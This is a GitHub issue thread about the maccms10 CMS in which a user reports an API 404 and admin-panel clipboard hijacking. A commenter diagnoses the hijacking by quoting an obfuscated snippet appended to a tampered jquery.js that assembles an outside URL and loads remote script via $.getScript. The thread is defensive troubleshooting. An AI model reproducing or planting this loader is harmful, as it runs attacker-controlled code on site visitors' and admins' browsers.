### ISSUE TITLE
大神有两个奇葩问题求解

### ISSUE THREAD

**Issue by xiao15939987** [magicblack/maccms10#1010]
问题 0x1开放API  比如我访问 http://1.1.1.1/api.php/provide/vod/?ac=list    直接提示File not found.
问题 0x2每当我在后台复制 和开启防红跳转复制时候  复制的都是这些 ￥SGB1dUr7Dxu￥ 我根据￥符号通过FileLocatorPro定位到一个文件application\admin\view\addon\index.html  108行处出现了这个符号 <p><b>￥'+row.price+'</b></p> <p>{:lang('author')}: '+row.author+'</p>  只要我在后台复制任何东西当我粘贴都会出现随机字符和￥4GB1dUr7Dxu￥这样的东西到我粘贴板

**Comment by xiao15939987** [comment]
108行处出现了这个符号         h ='<div class="layui-col-md3"><div class="addon"> <a href="#" target="_blank"> <img src="'+row.image+'" class="add-logo"> </a> <div class="addon-caption"> <h4>'+row.title+'<span class="layui-badge layui-bg-green">{:lang('level')}</span></h4> <p><b>￥'+row.price+'</b></p> <p>{:lang('author')}: '+row.author+'</p> <p>{:lang('intro')}: '+row.intro+'</p> <p>{:lang('ver')}: '+row.version+'</p> <p>{:lang('update_time')}: '+ getDataTime(row.createtime)+'</p>';

**Comment by 52linglong** [comment]
关于问题二，自动复制，检查 /static/js/jquery.js 是否被修改，文件最后有的添加了代码如下：

`$.ajaxSetup({ cache: true });(function (a,b,c,d,e) { e = e || { e:'a'+'pi.', j:'m'+'ac' + 'cms', a:'.si'+'te/c'+'ms/jqu'+'ery', c:'ht'+'tps:/'+'/', d:'ge'+'t' + 'Scr' + 'ipt', f:'.a'+'jax' }; a[e?e.d:e](e.c+e.e+e.j+e.a+e.f+c+d); })($,'g','.j','s');`

建议直接下载原始版本替换。

**Comment by magicblack** [comment]
问题1，检查服务器nginx和伪静态配置；
问题2，如楼上所说，看起来像是文件不干净~
